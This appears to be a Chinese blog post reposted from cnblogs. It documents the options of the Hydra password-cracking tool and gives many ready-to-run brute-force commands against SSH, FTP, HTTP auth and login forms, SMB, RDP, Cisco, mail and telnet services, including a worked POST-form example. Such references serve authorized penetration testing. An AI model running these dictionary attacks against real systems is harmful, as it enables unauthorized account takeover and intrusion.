标签:class name font 提交 密码破解 nis 分割 head sock
Options:
-R
继续从上一次进度接着破解-S
大写,采用SSL链接-s <PORT>
小写,可通过这个参数指定非默认端口-l <LOGIN>
指定破解的用户,对特定用户破解-L <FILE>
指定用户名字典-p <PASS>
小写,指定密码破解,少用,一般是采用密码字典-P <FILE>
大写,指定密码字典-e <ns>
可选选项,n:空密码试探,s:使用指定用户和密码试探-C <FILE>
使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数-M <FILE>
指定目标列表文件一行一条-o <FILE>
指定结果输出文件-f
在使用-M参数以后,找到第一对登录名或者密码的时候中止破解-t <TASKS>
同时运行的线程数,默认为16-w <TIME>
设置最大超时的时间,单位秒,默认是30s-v / -V
显示详细过程server
目标ipservice
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等
hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh
hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
# hydra -l administrator -P pass.txt 10.36.16.18 smb
# hydra -l muts -P pass.txt my.pop3.mail pop3
# hydra ip rdp -l administrator -P pass.txt -V
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
- 破解POST表单
<form action="index.php" method="POST"> <input type="text" name="name" /><BR><br> <input type="password" name="pwd" /><br><br> <input type="submit" name="sub" value="提交"> </form>
hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>Error Password</title>”
注释:<title>随意定制,错误信息返回</title>
标签:class name font 提交 密码破解 nis 分割 head sock
原文地址:http://www.cnblogs.com/ONDragon/p/6851773.html